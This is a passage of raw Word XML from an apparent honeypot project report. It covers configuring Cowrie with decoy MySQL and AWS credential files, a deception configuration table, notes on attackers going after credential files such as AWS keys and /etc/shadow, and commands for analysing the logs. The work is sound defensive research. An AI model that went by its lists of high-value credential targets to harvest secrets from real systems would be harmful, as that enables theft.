          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B29527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echo '[client]' &gt;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/etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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mysql.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B4DDB60"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echo 'user=root' &gt;&gt;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/etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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mysql.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04E5CF8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echo 'password=Sup3rS3cur3!' &gt;&gt;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/etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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mysql.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F57968E"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cat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/etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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mysql.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E37B2FB" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="54544A44" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="622A0F4C" w14:textId="77777777" w:rsidR="004B5C58" w:rsidRDefault="004B5C58"/>
    <w:p w14:paraId="5AD3F7FF" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="2C3206B0" w14:textId="77777777" w:rsidR="00361CDB" w:rsidRDefault="00361CDB"/>
    <w:p w14:paraId="19DA2885" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>4b — Create fake AWS credentials file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615127EB"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mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p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/home/admin</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>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aws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="017545A8"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echo '[default]' &gt;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/home/admin</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>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aws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFDE4FF"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echo '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>aws_access_key_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = AKIAIOSFODNN7EXAMPLE' &gt;&gt;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/home/admin</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>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aws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4946CF7F"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echo '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>aws_secret_access_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wJalrXUtnFEMI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/K7MDENG/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bPxRfiCYEXAMPLEKEY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>' &gt;&gt;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/home/admin</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>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aws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C931DB5"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cat ~/cowrie/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>honeyfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/home/admin</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>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aws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E76D63" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="335C577E" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc231686563"/>
      <w:r>
        <w:t>Step 5 — Restart Cowrie to Apply Changes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="78953F3B"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cowrie-env/bin/cowrie restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A7BF0F"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cowrie-env/bin/cowrie status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E596969" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="172D9526" w14:textId="7838176C" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc231686564"/>
      <w:r>
        <w:t>3.2 Deception Configuration Record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70508C1F"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4ABF8887" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Deception Element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30E585F3" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Configuration Applied</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="4039BC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D1C8117" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Hostname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99124B3" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>fileserver-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="58F794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04FDB2" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SSH Banner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854D6A" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="505371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D0438E9" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fake Users Added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6081D29" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>root, admin, ubuntu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="099106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382F40" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Fake Files Created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797BDA" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/etc/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>mysql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>mysql.conf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>, /home/admin</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aws</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="6A63F8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BA9BDF7" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Deception Rationale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9E968BD" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The hostname fileserver-01 and genuine Ubuntu SSH banner position the honeypot as a legitimate corporate file server. Fake MySQL and AWS credentials target the high-value file types </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>most commonly harvested</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in real-world breaches — identical to the attack vector behind IBM's documented $4.88 million average breach cost in 2024.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1835EDCF" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="7F345D79" w14:textId="77777777" w:rsidR="006B1806" w:rsidRDefault="006B1806"/>
    <w:p w14:paraId="02761B93" w14:textId="77777777" w:rsidR="006B1806" w:rsidRDefault="006B1806"/>
    <w:p w14:paraId="081405C5" w14:textId="77777777" w:rsidR="006B1806" w:rsidRDefault="006B1806"/>
    <w:p w14:paraId="6F1BCDA0" w14:textId="77777777" w:rsidR="006B1806" w:rsidRDefault="006B1806"/>
    <w:p w14:paraId="140B7617" w14:textId="77777777" w:rsidR="006B1806" w:rsidRDefault="006B1806"/>
    <w:p w14:paraId="3321EF03" w14:textId="77777777" w:rsidR="006B1806" w:rsidRDefault="006B1806"/>
    <w:p w14:paraId="34AEFDD5" w14:textId="77777777" w:rsidR="006B1806" w:rsidRDefault="006B1806"/>
    <w:p w14:paraId="57A10F23" w14:textId="77777777" w:rsidR="006B1806" w:rsidRDefault="006B1806"/>
    <w:p w14:paraId="1CA181DA" w14:textId="77777777" w:rsidR="006B1806" w:rsidRDefault="006B1806"/>
    <w:p w14:paraId="5DE47B47" w14:textId="77777777" w:rsidR="006B1806" w:rsidRDefault="006B1806"/>
    <w:p w14:paraId="4027CB41" w14:textId="77777777" w:rsidR="006B1806" w:rsidRDefault="006B1806"/>
    <w:p w14:paraId="031FC849" w14:textId="77777777" w:rsidR="006B1806" w:rsidRDefault="006B1806"/>
    <w:p w14:paraId="67F0EEE5" w14:textId="14E7130A" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc231686565"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.3 Deception Layer Observations &amp; Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="2109B916" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Deception works precisely because it exploits attacker confidence. When fake credentials grant access, attackers abandon caution and execute their complete toolkit — reconnaissance, credential harvesting, and malware deployment — revealing objectives they would otherwise conceal during failed login attempts. This project captured that exact behavioural shift: nine successful logins triggered seven post-login commands targeting the highest-value files on any compromised server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0E3811" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Those targets were deliberate. Attackers consistently prioritise files that enable lateral movement and financial gain — AWS access keys, database credentials, SSH private keys, and /etc/shadow. This project planted fake equivalents of each, confirming that attackers moved immediately toward cloud infrastructure and database access — the same credential categories driving </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>IBM's</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> documented $4.88 million average breach cost in 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7589AB0E" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7431D8" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc231686566"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4. Attack Capture &amp; TTP Collection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="4934AE40" w14:textId="2526B4DF" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc231686567"/>
      <w:r>
        <w:t>4.1 Cowrie Log File Structure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5BDCC6ED"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050D9D81" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>File / Folder</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765FFF94" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Contents</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="357B7F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FC85D2C" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>var/log/cowrie/cowrie.log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AB2A1E" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Live text log — every connection, login attempt, and command in real time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="1A8E9E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CA45EC" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>var/log/cowrie/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cowrie.json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E95C81" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Structured JSON format — direct input for Splunk ingestion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="64FB7C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C6A1635" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>var/lib/cowrie/downloads/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E2D468" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Files attackers attempted to download — potential malware samples</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062444D" w14:paraId="72DACC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D15DF4" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>var/lib/cowrie/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>tty</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0E0B77" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Full session recordings — </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>replayable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> attacker terminal sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4EE0E5D5" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="0062444D"/>
    <w:p w14:paraId="24DE08CD" w14:textId="58F59B10" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc231686568"/>
      <w:r>
        <w:t>4.2 Log Analysis Commands</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="750473F1" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>View live log in real time:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E0CBB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tail -f ~/cowrie/var/log/cowrie/cowrie.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F47D0E" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>View all login attempts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166E5DCD"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grep 'login attempt' ~/cowrie/var/log/cowrie/cowrie.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2311418A" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>View all commands typed by attackers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680C0A38"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grep 'CMD' ~/cowrie/var/log/cowrie/cowrie.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F1044D" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>View all files attackers tried to download:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293EBE6A"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grep 'Downloaded URL' ~/cowrie/var/log/cowrie/cowrie.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671BA413" w14:textId="77777777" w:rsidR="0062444D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Replay a full attacker session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A725641" w14:textId="77777777" w:rsidR="0062444D" w:rsidRPr="0040162F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ls ~/cowrie/var/lib/cowrie/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F63BDEC"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 xml:space="preserve">cowrie-env/bin/cowrie </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>playlog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> var/lib/cowrie/</w:t>
      </w:r>
